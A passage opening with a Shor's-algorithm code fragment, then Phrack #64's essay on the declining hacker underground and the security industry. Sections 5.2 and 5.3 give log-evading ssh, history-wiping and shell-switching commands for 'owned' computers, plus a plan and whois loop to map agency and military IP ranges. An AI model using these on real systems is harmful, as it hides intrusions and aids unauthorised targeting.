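    circuit computes efficiently; brute force stands in for it here."""
    r, x = 1, a % n
    while x != 1:
        x = (x * a) % n
        r += 1
    return r

def shor_classical_part(n, a):
    """Given a candidate a, try to split n using the order of a mod n."""
    g = gcd(a, n)
    if g != 1:
        return g, n // g          # lucky: a already shares a factor
    r = order(a, n)
    if r % 2:
        return None               # odd order: retry with another a
    y = pow(a, r // 2, n)
    if y == n - 1:
        return None               # trivial square root: retry
    return gcd(y - 1, n), gcd(y + 1, n)

print(shor_classical_part(15, 7))   # (3, 5): the order of 7 mod 15 is 4
```

On a classical machine order() is the exponential bottleneck; with a
quantum period-finding circuit it becomes polynomial, and RSA moduli
fall.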
Unfortunately, we have no information on which known quantum algorithms
run on the D-Wave computer, and D-Wave made no statement about running
Shor's algorithm on their beast. Also, no claim has been made letting
us think the chip could break RSA. And for sure, NSA experts have
probably already studied the situation (in case they don't already own
their own quantum computer).




              _                                                _
            _/B\_                                            _/W\_
            (* *)             Phrack #64 file 4              (* *)
            | - |                                            | - |
            |   |  A brief history of the Underground scene  |   |
            |   |                                            |   |
            |   |        By The Circle of Lost Hackers       |   |
            |   |                                            |   |
            |   |                                            |   |

--[ Contents

1. Introduction
2. The security paradox
3. Past and present Underground scene
	3.1. A lack of culture and respect for ancient hackers
	3.2. A brief history of Phrack
	3.3. The current zombie scene
4. Are security experts better than hackers?
	4.1. The beautiful world of corporate security
	4.2. The in-depth knowledge of security conferences
5. Phrack and the axis of counter attacks
	5.1. Old idea, good idea
	5.2. Improving your hacking skills
	5.3. The Underground yellow pages
	5.4. The axis of knowledge
		5.4.1. New Technologies
		5.4.2. Hidden and private networks
		5.4.3. Information warfare
		5.4.4. Spying System
6. Conclusion

--[ 1. Introduction

"It's been a long long time,
I kept this message for you, Underground
But it seems I was never on time
Still I wanna get through to you, Underground..."

    I am sure most of you know and love this song (Stir It Up). After all,
who doesn't like a Bob Marley song? The lyrics of this song fit very well
with my feelings: I was never on time but now I'm ready to deliver the
message to you.

    So what is this article about? I could write another technical article
about an eleet technique to bypass a buffer overflow protection, how to
inject my magical module in the kernel, how to reverse like an eleet or
even how to make a shellcode for a not-so-famous OS. But I won't. There
are other people who can do it much better than I could.

    But that is not the real reason for not writing a technical article.
The purpose of this article is to launch an SOS. An SOS to the scene, to
everyone, to all the hackers in the world. To make all the next releases
of Phrack better than ever before. And for this I don't need a technical
article. I need what I would call Spirit.

    Do you know what I mean by the word spirit?

--[ 2. The security paradox

    There is something strange, really strange. I always compare the
security world with the drug world. Take the drug world: on one side
you have all the "bad" guys: cartels, dealers, retailers, users... On
the other side, you have all the "good" guys: cops, the DEA,
pharmaceutical groups creating medicines against drugs, the president
of the USA asking for more budget to counter drugs... The main speech
of all these good guys is: "we have to eradicate drugs!". Well, why
not. Most of us agree.

    But if there were no more drugs in the world, I guess that a big part
of the world economy would fall. Small dealers wouldn't have the money
to buy food, pharmaceutical groups would lose a big part of their
business, the DEA and similar agencies wouldn't have any reason to
exist. All the drug treatment centers could be closed, banks would lose
the money coming from the drug market. If you take all those things
into consideration, do you think that governments really want to
eradicate drugs? Asking the question is probably answering it.

    Now let's move on to the security world.

    On one side you have a lot of companies, conferences,
open source security developers, computer crime units... On the
other side you have hackers, script kiddies, phreakers... Should
I explain this again, or can I directly ask the question? Do you really
think that security companies want to eradicate hackers?

    To show you how these two worlds are similar, let's look at another
example. Sometimes, you hear about the cops arresting a dealer, maybe a
big dealer. Or even an entire cartel. "Yeah, look! We have arrested a
big dealer! We are going to eradicate all the drugs in the world!!!".
And sometimes, you see news like "CCU arrests Mafiaboy, one of the best
hackers in the world". Computer crime units and the DEA need publicity -
they arrest someone and say that this guy is a terrorist. That's the
best way to ask for more money. But they will rarely arrest one of the
best hackers in the world. Two reasons. First, they don't have the
intention (and if they did, it would probably be to hire him rather
than arrest him). Secondly, most Computer Crime Units don't have the
required knowledge.

    This is really a shame; nobody is honest. Our governments claim that
they want to eradicate hackers and drugs, but they know that if there
were no more hackers or drugs a big part of the world economy could
fall. It's exactly the same thing with wars. All our presidents claim
that we need peace in the world, and again most of us agree. But if
there were no more wars, companies like Lockheed Martin, Raytheon,
Halliburton, EADS, SAIC... would lose a huge part of their markets, and
banks wouldn't have the money generated by the wars.

    The paradox lies in the perpetual assumption that the threat is
generated by abuses, where in fact it might come from improper
technological design, or from money-driven technological improvement
where the second element shadows the first. And when someone dedicated
enough digs into it, we have a snowball effect, and every fish in the
pond, at one time or another, becomes a part of it.

   And as you can see, this paradox is not exclusive to the security
industry/underground or even the computer world; it could be considered
the golden idol paradox, but we do not want to go there.

    In conclusion, the security world needs a reason to justify its
business. This reason is the presence of hackers, of a threat (whatever
"hacker" means), the presence of a hacking scene and, in more general
terms, the presence of the Underground.

    We don't need them to exist; we exist because we like learning,
learning what we are not supposed to learn. But they give us another
good reason to exist. So if we are "forced" to exist, we should exist
in the right way. We should be well organized, with a spirit that
reflects our philosophy. Unfortunately, the spirit which used to
characterize us is long gone...

--[ 3. Past and Present Underground scene

    The "scene" - this is a beautiful word. I am currently in a country
very far away from all of your countries, but it is still an
industrialized country. After spending some months in this country, I
found some old-school hackers. When I asked them how the scene was in
their country, they always answered the same thing: "like everywhere,
dying". It's a shame, really a shame. The security world is getting
larger and larger and the Underground scene is dying.

    I am not an old-school hacker. I don't have the pretension to claim
it. I would rather say that I have some old-school tricks, or maybe that
my mind is old-school oriented, but that's all. I started to enjoy the
hacking life more or less 10 years ago. And the scene was already dying.

    When I started hacking, like a lot of people, I read all the past
issues of Phrack. And I really enjoyed the experience. Nowadays,
I'm pretty sure that new hackers don't read old Phrack articles anymore.
Because they are lazy, because they can find information elsewhere,
because they think old Phracks are outdated... But reading old Phracks
is not only about acquiring knowledge, it's also about acquiring the
hacking spirit.

----[ 3.1 A lack of culture and respect for ancient hackers

    How many new hackers know hacker history? A simple example is
SecurityFocus. I'm sure a lot of you consult its vulnerability
database or some of its mailing lists. Maybe some of you know Kevin
Poulsen, who worked for SecurityFocus for some years and now works for
Wired. But how many of you know his history? How many knew that at the
beginning of the 80's he was arrested for the first time for breaking
into ARPANET? And that he was arrested several more times after that.
Probably not a lot of you (what's ARPANET, after all...).

    It's exactly the same kind of story with the most famous hacker in
the world: Kevin Mitnick. This guy really was amazing and I have
total respect for what he did. I don't want to argue about his present
activity; it's his choice and we have to respect it. But nowadays,
when new hackers talk about Kevin Mitnick, one of the first things I
hear is: "Kevin is lame. Look, we have defaced his website, we are much
better than him". This is completely stupid. They probably found a
stupid web bug to deface his website, and they probably found the way
to exploit the vulnerability in a book like Hacking Web Exposed. And
after reading this book and defacing Kevin's website, they claim that
Kevin is lame and that they are the best hackers in the world... Where
are we going? If these hackers could do a third of what Kevin did, they
would be considered heroes in the Underground community.

    Another part of the hacking culture is what some people call "The
Great Hackers War" or simply the "Hackers War". It happened 15 years
ago between probably the two most famous (best?) hacker groups that
ever existed: the Legion of Doom and the Masters of Deception. Beyond
the fact that this chapter of hacking history is amazing (google it),
what I wonder is how many hackers of the new generation know that
famous hackers like Erik Bloodaxe or The Mentor were part of these
groups. Probably not a lot. These groups were mainly composed of
skilled and talented hackers/phreakers. And they were our predecessors.
You can still find their profiles in past issues of Phrack. It's still
a nice read.

    Let's go for another example. Who knows Craig Neidorf? Nobody? Maybe
Knight Lightning sounds more familiar to you... He was the first editor
in chief of Phrack, along with Taran King - Taran King, who called him
his "right hand man". With the two of them, we had a lot of good
articles, spirit oriented. So spirit oriented that one article almost
sent him to jail for disclosing a confidential document from Bell
South. Fortunately, he didn't go to jail, thanks to the Electronic
Frontier Foundation who defended him. Craig wrote for the first time in
Phrack issue 1 and for the last time in Phrack issue 40. He is simply
the best contributor that Phrack has ever had, with more than 100
contributions. Not interesting? This is part of the hacking culture.

    More recently, in the 90's, an excellent "magazine" (it was more a
collection of articles) called F.U.C.K. (Fucked Up College Kids) was
made by a hacker named Jericho... Maybe some new hackers know Jericho
for his work on (and even that's not certain...), but have
you ever taken the time to check the Attrition website and consult all
the good work that Jericho and friends do? Did you know that Jericho
wrote excellent Phrack World News under the name Disorder 10 years ago
(and trust me, his news was great)? Stop thinking that is
only an old dead mirror of website defacements; it's much more, and
it's spirit oriented.

    Go ask Stephen Hawking if knowing the history of science is not
important to understand the scientific way/spirit... Do you think that
Stephen doesn't know the story of Aristotle, Galileo, Newton or
Einstein?

    To help wannabe hackers, I suggest that they read "The Complete
History of Hacking" or "A History of Computer Hacking", which are very
interesting for a first dive into hacking history and can easily be
found with your favorite search engine.

    Another good read is the interview with Erik Bloodaxe from 1994,
where Erik said something really interesting about Phrack:

"I, being so ridiculously nostalgic and sentimental, didn't want to see
it (phrack) just stop, even though a lot of people always complain about
the content and say, "Oh, Phrack is lame and this issue didn't have enough
info, or Phrack was great this month, but it really sucked last month."
You know, that type of thing. Even though some people didn't always
agree with it and some people had different viewpoints on it, I really
thought someone needed to continue it and so I kind of volunteered for
the job."

    It's still true...

----[ 3.2 A brief history of Phrack

    Let's go for a short hacking history course and let's take a look at
old Phracks where people talked about the scene and what hacking is.

Phrack 41, article 1:

"The type of public service that I think hackers provide is not showing
security holes to whomever has denied their existence, but to merely
embarrass the hell out of those so-called computer security experts
and other purveyors of snake oil."

    This is true, completely true. This is closely related to what I said
before. If there are no hackers, there are no security experts. They
need us. And we need them. (We are family)

Phrack 48, article 2:

    At the end of this article, there is the last editorial of Erik
Bloodaxe. This editorial is excellent, everyone should read it. I will
just reproduce some parts here:

"... The hacking subculture has become a mockery of its past self.
People might argue that the community has "evolved" or "grown" somehow,
but that is utter crap.  The community has degenerated.  It has become a
media-fueled farce.  The act of intellectual discovery that hacking once
represented has now been replaced by one of greed, self-aggrandization
and misplaced post-adolescent angst... If I were to judge the health of
the community by the turnout of this conference, my prognosis would be 
"terminally ill."..."

    And this was in 1996. If we asked Erik Bloodaxe now what he thinks
about the current scene, I'm pretty sure he would say something
like: "irretrievable" or "the hacking scene has reached a point of no
return".

"...There were hundreds of different types of systems, hundreds
of different networks, and everyone was starting from ground zero.
There were no public means of access; there were no books in stores or
library shelves espousing arcane command syntaxes; there were no classes
available to the layperson. ..."

    Have you ever heard of a "hackademy"? Nowadays, if you want to be a
hacker it's really easy. Just go to a hacker school and they will teach
you some of the most eleet tricks in the world. That's the new hacker
way.

"Hacking is not about crime. You don't need to be a criminal to be
a hacker. Hanging out with hackers doesn't make you a hacker any more
than hanging out in a hospital makes you a doctor. Wearing the t-shirt
doesn't increase your intelligence or social standing. Being cool doesn't
mean treating everyone like shit, or pretending that you know more than
everyone around you."

    So what is hacking? My point of view is that hacking is a
philosophy, a philosophy of life that you can apply not only to
computers but to a lot of things. Hacking is learning: learning
computers, networks, cryptology, telephone systems, spying systems and
agencies, radio, what our governments hide... Actually, all
non-conventional subjects - what could also be called a third-eye view
of the context.

"There are a bunch of us who have reached the conclusion that the "scene"
is not worth supporting; that the cons are not worth attending; that the
new influx of would-be hackers is not worth mentoring. Maybe a lot of us
have finally grown up."

    Here's my answer to Erik 10 years later: "No Erik, you hadn't
finally grown up, you were right." Erik already sent an SOS 10 years
ago and nobody heard it.

Phrack 50, article 1:

"It seems, in recent months, the mass media has finally caught onto
what we have known all along, computer security _IS_ in fact important.
Barely a week goes by that a new vulnerability of some sort doesn't pop up
on CNN. But the one thing people still don't seem to fathom is that _WE_
are the ones that care about security the most...  We aren't the ones that
the corporations and governments should worry about...	We are not
the enemy."

    No, we are not the enemy. But a lot of people claim that we are and
some people even sell books with titles like "Know your enemy". It's
probably one of the best ways to be hated by a lot of hackers. Don't be
surprised if there are some groups like PHC appearing after that.

Phrack 55, article 1:

    Here I will show you the arrogance of a not-so-distant past editor,
answering some comments:

"...Yeah, yeah, Phrack is still active you may say. Well let me tell
you something.	Phrack is not what it used to be. The people who make
Phrack are not Knight Lightning and Taran King, from those old BBS
days. They are people like you and me, not very different, that took
on themselves a job that it is obvious that is too big for them. Too
big? hell, HUGE. Phrack is not what it used to be anymore. Just try
reading, let's say, Phrack 24, and Phrack 54..."

    And the editor replied (maybe Route):

"bjx of "PURSUiT" trying to justify his `old-school` ezine.  bjx wrote
a riveting piece on "Installing Slackware" article.  Fear and respect
the lower case "i"".

    This is a perfect example of how the Underground scene has changed
in the last few years. We can interpret the editor's answer as "I'm
writing eleet articles and you are not, so I don't have to take your
point of view into consideration". But it was a really pertinent
remark.

Phrack 56, article 1:

    Here is another excellent example to show you the arrogance of the
Underground scene. Again, it's an answer to a comment from someone:

"...IMHO it hasn't improved. Sure, some technical aspects of the
magazine have improved, but it's mostly a dry technical journal these
days.  The personality that used to characterize Phrack is pretty much
non-existant, and the editorial style has shifted towards one of `I know
more about buffer overflows than you` arrogance. Take a look at the Phrack
Loopback responses during the first 10 years to the recent ones. A much
higher percentage of responses are along the lines of `you're an idiot,
we at Phrack Staff are much smarter than you.`..."

    And the reply:

" - Trepidity <> apparently still bitter at
not being chosen as Mrs. Phrack 2000."

    IMHO, Trepidity's remark was probably the best remark in a long
long time.

    Let's stop this little history course. I have shown you that I'm
not alone in my reflection and that there is something wrong with the
current dysfunctional scene. Some people already thought this 10 years
ago and I know that a lot of people are currently thinking exactly the
same thing. The scene is dying and its spirit is flying away.

    I'm not Erik Bloodaxe, I'm not Voyager or even Taran King... I'm
just me. But I would like to do something like 15 years ago, when the
word hacking was still used in the noble sense. When the spirit was
still there. We all need to react together, or the beast will eat
what's left of the spirit.

----[ 3.3 The current zombie scene

    "A dead scene whose body has been re-animated but whose spirit
is lacking".

    I'm not really aware of every 'group' in the world. Some people are
much more connected than me. And to be honest, I knew the scene better
5 years ago than I do now. But I will try to give you a snapshot of
what the current scene is. Forgive me in advance for the groups that I
will forget; it's really difficult to make an accurate snapshot. The
best way to get a snapshot of the current scene would probably be to
use an algorithm like HITS, which allows detecting web communities. But
unfortunately I don't have time to implement it.

    So the current scene for me is like a pyramid, and it's organized
like secret societies. I would like to split hacker groups into 3
categories. In order not to give stupid names to these groups, I will
call them layer 1, layer 2 and layer 3 groups. In layer 1, 5 years ago,
you had some really "famous" groups which were, I think, composed of
talented people. I will split this layer into two categories: front-end
groups and back-end groups. Some of the groups I call front-end are:
TESO, THC, w00w00, Phenoelit or Hert. Back-end groups include ADM,
Synergy, ElectronicSouls or Devhell. And you also have PHC, which you
can include in both categories (you know guys, you have your entry in
Wikipedia!). And at the top of that (but mainly at the top of PHC) you
had obscure/eleet groups like AB.

   In layer 2, I would like to include a lot of smaller groups which I
think are trying to do good stuff. Generally, these groups have no
communication with layer 1 groups. These groups are: Toxyn,, Netric, Felinemenace, S0ftpj (nice mag), Nettwerked
(congratulations for the skulls image, guys!), Moloch, PacketWars,
Eleventh Alliance, Progenic, HackCanada, Blacksecurity, Blackclowns or
Aestetix. You can still split these groups into two categories,
front-end and back-end. Back-end are Toxyn or; the others
are probably front-end.

    Besides these groups, you have a lot of wannabe groups that I'd
like to include in layer 3, composed of the new generation of hackers.
Some of these groups are probably good and I'm sure that some have the
good hacking spirit, but generally these groups are composed of hackers
who learned hacking in a school or by reading hacker magazines found in
a library. When you see a hacker arrested in the media, he generally
comes from one of these unknown groups. 20 years ago, cops arrested
hackers like Kevin Mitnick (The Condor), Nahshon Even-Chaim (Phoenix,
The Realm), Mark Abene (Phiber Optik, Legion of Doom) or John Lee
(Corrupt, Masters of Deception); now they arrest Mafiaboy for a DDoS...

    There are also some (dead) old-school groups like cDc, Lopht or
rhino9, independent skilled guys like Michal Zalewski or Silvio Cesare,
research groups like Lsd-pl and Darklab, and obscure people like
GOBBLES, N3td3v or Fluffy Bunny :-) And of course, I don't forget the
people who are not affiliated with any group.

    You can also find some central resources for hackers or phreakers
like PacketStorm or, and magazine-oriented resources like
Pull the Plug or Uninformed.

    In this wonderful world, you can also find some self-proclaimed
eleet mailing lists like ODD.

    We can represent all these groups in a pyramid. Of course, this
pyramid is not perfect. So don't blame me if you think that your group
is not in the right category; it's just an attempt.

		       The Underground Pyramid
				/ \
			       /   \
			      /     \
			     /	     \
			    /	      \     <-- More eleet hackers in
			   /   \   /   \	the world. Are you in?
			  /    -(o)-	\
			 /     /   \	 \
			/		  \
		       /		   \
		     /			     \	<-- skilled hackers
		    /	AB, Fluffy Bunny, ... \     hacking mainly 
		   /___________________________\    for fun
		  /	|	|	  |	\
		 / PHC	| TESO	| ADM	  | cDc  \  <-- Generally
		/  EL8	| THC	| Synergy | Lopht \	excellent skills 
	       / GOBBLES| WOOWOO| Devhell | rhino9 \	some groups have
	      /    ...	| ...	| ...	  | ....    \	the good spirit
	    /			|		      \
	   /	|     HackCanada       \  <-- good skills,
	  /	 Toxyn		|     Felinemenace	\     some are
	 /	 ...    	|     Netric		 \    very
	/	 		|     ...		  \   original
      /							    \
     /			  WANABEE GROUPS		     \ <-- newbies
   /							       \ <-- info
  / Resources: 2600,Phrack, PacketStorm,, Uniformed, \    for
 /				PTP, ...			 \   all

    All of these people make up the current scene. It's a big mixture
of white/gray/black hats, where some people are white hat by day and
black hat at night (and vice-versa). Sometimes there is communication
between them, sometimes not. I also have to say that it's generally
the people from layer 1 groups who give talks at security conferences
around the world...

    It's really a shame that PHC is probably the best ambassador of the
hacking spirit. Their initiative was great and really interesting.
Moreover they are quite funny. But IMHO, they are probably a little too
arrogant to be considered an old-spirit group.

    Actually, the bad thing is that all these people are more or less
separate and everyone is fighting everyone else. You can even find some
hackers hacking other hackers! Where is the scene going? Even if you
are technically very good, do you have to tell everyone that you are
the best and call the others lamerz? The new hacker generation will
never understand the hacking spirit with this mentality.

    Moreover, the majority of hackers are completely uninterested in
the alternative subjects addressed, for example, in 2600 magazine or on
the Cryptome website. And this is really a shame because these two
media publish some really good information. Most hackers are only
interested in pure hacking techniques like backdooring, network
exploitation, client vulnerabilities... But for me hacking is closely
related to other subjects like those addressed on the Cryptome website.
For example, the majority of hackers don't know what SIPRNet is. There
is only one reference in Phrack, but there are several articles about
SIPRNet in 2600 magazine or on the Cryptome website. When I want to
discuss all these interesting subjects it's really difficult to find
someone in the scene. And to be honest, the only people I can find are
people away from the scene. The majority of hackers composing the
groups I mentioned above are not interested in these subjects (as far
as I know). Old school hackers in the 80's or 90's were more interested
in alternative subjects than the new generation is.

    In conclusion, we first have to get back the old school hacking
spirit, and afterwards explain to the new generation of hackers what
it is.

    It's the only way to survive. The scene is dying but I won't say
that we can't do anything. We can do something. We must do something.
It's our responsibility.

--[ 4 Are security experts better than hackers?

    STOP!!!!! I do not want to say that security experts are better
than hackers. I don't think they are, but to be honest it's not really
important. It's nonsense to ask who is better. The best guy,
independently of the techniques he uses, is always the most ingenious.
But there are two points that I would like to develop.

----[ 4.1 The beautiful world of corporate security

    I met a really old school hacker some months ago; he told me
something very pertinent and I think he was right. He told me that
technology has really changed these last years but that the old school
tricks still work. Simply because the people working for security
companies don't really care about security. They care more about
finding a new eleet technique to attack or defend a system, and
presenting it at a security conference, than about using it in
practice.

    So Underground, we have a problem. A major problem. 15 years ago,
there were a lot of people working for the security industry. At the
same time, there were also a lot of people working in what I will call
the Underground scene. No-one can estimate the percentage in each camp,
but I would say it was something like 60% working in security and 40%
working in the Underground scene. It was still a good distribution.
Nowadays, I'm not sure it's still true. A better estimation would be
80/20 oriented to security, or maybe even worse... There are more and
more people working for the security world than for the Underground
scene. Look at all these "eleet" security companies like ISS, Core
Security, Immunity, IDefense, eEye, @stake, NGSSoftware, Checkpoint
(!), Counterpane, Sabre Security, Net-Square, Determina,
SourceFire... I will stop here, otherwise Google will make some
publicity for these companies. All these security companies have hired
and still hire some hackers, even if they will say that they don't.
Sometimes, they don't even know they hired a hacker. How many past
Phrack writers work for these companies? My guess is a lot, really a
lot. After all, you can't stop a hacker if you have never been one.

    You'll tell me: "that's normal, everyone has to eat". Yeah, that's
true. Everyone has to eat. I'm not talking about that. What I don't
like (even if we do need these good and bad guys) is all the stuff
around the security world: conferences, (false) alerts, magazines,
mailing lists, pseudo security companies, pseudo security websites,
pseudo security everything...

    Can you tell me why there is so much security related stuff and not
so much Underground related stuff?

--[ 4.2 The in-depth knowledge of security conferences

    If you have a look at all the topics addressed in a security
conference, it's amazing. Take the most famous conferences: *Blackhat,
*SecWest or even Defcon (I mention only marketing conferences; there
are other good conferences that are less corporate/business oriented,
like CCC, PH-Neutral, HOPE or WTH). Now look at the talks given by the
speakers, they're really good. When I went to a security conference 5 
years ago it was so funny, I was saying to my friends: "these guys are 
5 years late". It was true then but I think it's not true anymore. They 
are probably still late, but not as late as they were. But the most 
relevant point for me is that recently there have been a lot of very 
interesting subjects. OK not everything was interesting - there were 
some shit subjects too. What I would consider as interesting subjects 
are those related to new technologies (VOIP, WEB 2.0, RFID, BlackBerry, 
GPS...) or original topics like hardware hacking, BlackOps, agency 
relationships, SE story, bioinfo attack, nanotech, PsyOp... What the 
Fuck ?!#@?! 10 years ago, all the original topics were released in an 
Underground magazine like Phrack or 2600. Not in a security conference 
where you have to pay more than $1000.

    This is not my idea of what hacking should be. Do you really need
publicity like this to feel good? This is not hacking. I'm not talking
here about the core but the form. When I'm coding something at home all
night and in the morning it works, it's really exciting. And I don't
have to say to everyone "look at what I did!". Especially not in public
where people have to pay more than $1000 to hear you.

    Another incredible thing about these security conferences is what I
would call the "conference circuit". Nowadays, if you are a security
expert, the trend is to give the same talk at different security
conferences around the world. More than 50% of all security experts are
doing this. They go to America for BlackHat, Defcon and CanSecWest,
then they move to Europe, and they finish in Asia or Australia. They
can even do BlackHat America, BlackHat Europe and BlackHat Asia! Like
Roger Federer or Tiger Woods, they try to do the Grand Slam! So you can
find a talk given in 2007 which is more or less the same as one from
2005. Thus it seems we now have a new profession in our wonderful
security world: "conference runner"!

    The last funny thing is the number of talks that I would include in
the category "How to hack the system XXX". For example, at the last
Blackhat USA there was a talk on how to hack embedded devices such as
printers and copiers. Despite the fact that it's interesting
(collecting printed documents), what I find funny is that you just have
to hack a non-conventional device to be at Blackhat or Defcon. So, I
will give some good advice to hackers who want to become famous: try to
hack the coffee machine used by the FBI or the embedded device used by
the lift of the Pentagon, and everyone will see you as a hero or a
terrorist (that's context dependent).

--[ 5. Phrack and the axis of counter-attack

    Now that I have given you an overview of the security world, let's
try to see how we can change it. There are two possibilities here. The
first one is this: I say to you, "OK, now that you really understand
the problem, it's definitely time to change our mentality. This is the
new mind set that we have to adopt." It's a little bit pretentious to
say this, though. Nobody can solve the problem alone and pretend to
bring the right solution. So I guess that the first possibility won't
work. People will agree but nobody will do anything.

    The second possibility is to start with Phrack. All the people who
make up The Circle of Lost Hackers agree that Phrack should come back
to its past style, when the spirit was present. We really agree with
the quote above which said that Phrack is mainly a dry technical
journal. That's why we would like to give you some ideas that can bring
back to Phrack its bygone aura. Phrack doesn't belong to a group of
people; Phrack belongs to everyone, everyone in the Underground scene
who wants to bring something to the Underground. After all, Phrack is a
magazine made by the community for the community.

    We would like to invite everyone to give their point of view about the
current scene and the orientation that Phrack should take in the future.
We could compile a future article with all your ideas.

----[ 5.1. Old idea, good idea

    If you take a look at the old Phrack, there are some recurring
articles :

* Phrack LoopBack
* Line noise
* Phrack World News
* Phrack Prophiles
* International scenes

    Here's something funny about Phrack World News: if you take a look
at Phrack 36, it was not called "Phrack World News" but instead
"Elite World News"...

    So, all these articles were and are interesting. But among them, we
would like to resuscitate the last one: "International scenes". A first
attempt is made in this issue, but we would like people to send us
short descriptions of their scenes. It could be very interesting to
have some descriptions of scenes that are not common, for example the
Chinese scene, the Brazilian scene, the Russian scene, the African
scene, the Middle East scene... But of course we are also interested in
the more classic scenes like the Americas, GB, France, Germany, ...
Everything is welcome; hackers are not only in Europe and the Americas,
we're everywhere. And when we talk about the Underground scene, it
should include all local scenes.

----[ 5.2. Improving your hacking skills

    Here we would like to start a new kind of article. An article whose
purpose is to give the new generation of hackers some different little
tricks to hack "like an eleet". This article will be present in every
new issue (at least until it's dead... we hope not soon). The idea is
to ask everyone to send us their tricks when they hack something (it
could be a computer or not). Each trick should be explained in no more
than 30 lines, and it could even be one line. It could be an eleet
trick or something really simple but useful. Example:

An almost invisible ssh connection

    In the worst case, if you have to ssh to a box, always do it with
no tty allocation:

    ssh -T user@host

    If you connect to a host this way, a command like "w" will not
show your connection. Better, add 'bash -i' at the end of the command
to simulate a shell:

     ssh -T user@host /bin/bash -i

    Another trick with ssh is to use the -o option, which allows you to
specify a particular known_hosts file (by default it's
~/.ssh/known_hosts). The trick is to use -o with /dev/null:

    ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

    With this trick the IP of the box you connect to won't be logged in
your known_hosts file.

    Using an alias is a good idea.
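    For instance, the whole stealth invocation can be wrapped in an
alias; the name 'sssh' is made up, pick your own. StrictHostKeyChecking
is turned off here because a /dev/null known_hosts file would otherwise
trigger a confirmation prompt on every connect:

```shell
# hypothetical alias wrapping the no-tty, no-known_hosts invocation;
# StrictHostKeyChecking=no suppresses the "unknown host" prompt that
# an always-empty known_hosts file would cause on each connection
alias sssh='ssh -o UserKnownHostsFile=/dev/null \
                -o StrictHostKeyChecking=no -T'
# usage: sssh user@host /bin/bash -i
```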

Erasing a file

    If you have to erase a file on an owned computer, try to use a tool
like shred, which is available on most Linux distributions.

shred -n 31337 -z -u file_to_delete

-n 31337 : overwrite the content of the file 31337 times
-z : add a final overwrite with zeros to hide the shredding
-u : truncate and remove the file after overwriting
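    Since shred ships with GNU coreutils, the behaviour is easy to
check on a throwaway file first (3 passes here just to keep the demo
fast):

```shell
# try shred on a scratch file before trusting it on a real box
f=$(mktemp)
echo "secret" > "$f"
shred -n 3 -z -u "$f"               # 3 overwrites, final zero pass, unlink
ls "$f" 2>/dev/null || echo "gone"  # prints "gone"
```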

    A better idea is to make a small partition in RAM with tmpfs or a
ramdisk and store all your files inside it.

    Again, using an alias is a good idea.

The quick way to copy a file

    If you have to copy a file to a remote host, don't bore yourself
with an FTP connection or similar. Do a simple copy and paste in your
Xconsole. If the file is a binary, uuencode it before transferring.

    A more eleet way is to use the program 'screen', which allows
copying a file from one screen to another:

    To start/stop :  C-a H or C-a : log

    And when it's logging, just do a cat on the file you want to transfer.
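    A small aside on the uuencode step above: uuencode lives in the
sharutils package and is often not installed, but base64 from coreutils
does the same copy-and-paste job:

```shell
# encode on the source box, then paste the text into your terminal
base64 /bin/ls > ls.b64
# ...on the target box, decode what you pasted:
base64 -d ls.b64 > ls.copy
cmp /bin/ls ls.copy && echo "identical"   # prints "identical"
```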

Changing your shell

    The first thing you should do when you are on an owned computer is
to change the shell. Generally, systems are configured to keep a
history for only one shell (say bash); if you change the shell (say to
ksh), your commands won't be logged.

    This will prevent you being logged in case you forget to clean
the logs. Also, don't forget 'unset HISTFILE', which is often useful.
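    A minimal hygiene sketch for a bash session, on top of the
shell-switching trick (this assumes bash; other shells have their own
knobs):

```shell
# stop the current bash from remembering anything
unset HISTFILE        # nowhere to write history at exit
export HISTSIZE=0     # and no in-memory history to write anyway
# a paranoid exit that skips ~/.bash_logout entirely: kill -9 $$
```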

    Some of these tricks are really stupid and for sure all old school
hackers know them (or don't use them because they have more eleet
tricks). But they are still useful in many cases and it would be
interesting to compare everyone's tricks.

----[ 5.3. The Underground yellow pages

    Another interesting idea is to maintain a list of all the
interesting IP ranges in the world. This article will be called
"Meaningful IP ranges". We have already started to scan all the class A
and B networks. What is really interesting is all the IP addresses of
the agencies which are supposed to spy on us. Have a look at this site:

    However we don't have to focus our list on agencies, but on
everything which is supposed to represent the powers of the world.

It includes:

* All agencies of a country (China, Russia, UK, France, Israel...)

* All companies in a domain, for example all companies related to private
  secret service or competitive intelligence or financial clearing or
  private army (dyncorp, CACI, MPRI, Vinnel, Wackenhut, ...)

* Companies close to government (SAIC, Dassault, QinetiQ, Halliburton,
  ...)

* Spying business companies (AT&T, Verizon, VeriSign, AmDocs, BellSouth,
  Top Layer Networks, Narus, Raytheon, Verint, Comverse, SS8, pen-link...)

* Spoken Medias (Al Jazeera, Al Arabia, CNN, FOX, BBC, ABC, RTVi, ...)

* Written Medias or press agencies (NY/LA Times, Washington Post,
  Guardian, Le monde, El Pais, The Bild, The Herald, Reuters, AFP, AP, 
  TASS, UPI...)

* All satellite maintainers (Intelsat, Eurosat, Inmarsat, Eutelsat,
  ...)

* Suspect investment firms (Carlyle, In-Q-Tel...)

* Advanced research centers (DARPA, ARDA/DTO, HAARP...)

* Secret societies, fake groups and think-tanks (The Club of Rome, The
  Club of Berne, Bilderberg, JASON group, Rachel foundation, CFR, ERT,
  UNICE, AIPAC, The Bohemian Club, Opus Dei, Chatham House, Church of
  ...)

* Guerilla groups, rebels or simply alternative groups (FARC, ELN, ETA,
  KKK, NPA, IRA, Hamas, Hezbollah, Muslim Brotherhood...)

* Ministries (Defense, Energy, State, Justice...)

* Militaries and international police forces (US Army, US Navy, US Air
  Force, NATO, European armies, Interpol, Europol, CCU...)

* And last but not least: HONEYPOT!

    It's obvious that not all ranges can be obtained. Some agencies are
registered under a false name in order to be more discreet (what about
ENISA, the European NSA?), others use some high level systems (VPN, tor
...) on top of normal networks, or simply use communication systems
other than the Internet. But we would like to keep the most complete
list we can, and for this we need your help. We need the help of
everyone in the Underground who is ready to share knowledge. Send us
your range.
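    As a starting point, here is a dry-run sketch of the kind of lookup
loop such a list can be built from. The organisation names below are
just examples, and the ARIN query syntax shown is an assumption; check
your whois server's help before relying on it:

```shell
# print (not run) the whois lookups that would map org names to
# netblocks; pipe to sh once you are happy with the query syntax
for org in "Defense Intelligence Agency" "NASA" "Halliburton"; do
    echo whois -h whois.arin.net "\"n $org\""
done
```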

    We started to scan the A and B ranges with a little script we made,
but be sure that the most interesting ranges are in class C. Here is a
quick start of the list:

 - : DoD Network Information Center
 - : Defense Intelligence Agency
 - : Defense Intelligence Agency
 - : Defense Intelligence Agency
 - : Defense Intelligence Agency
 - : Defense Intelligence Agency
 - : Defense Intelligence Agency
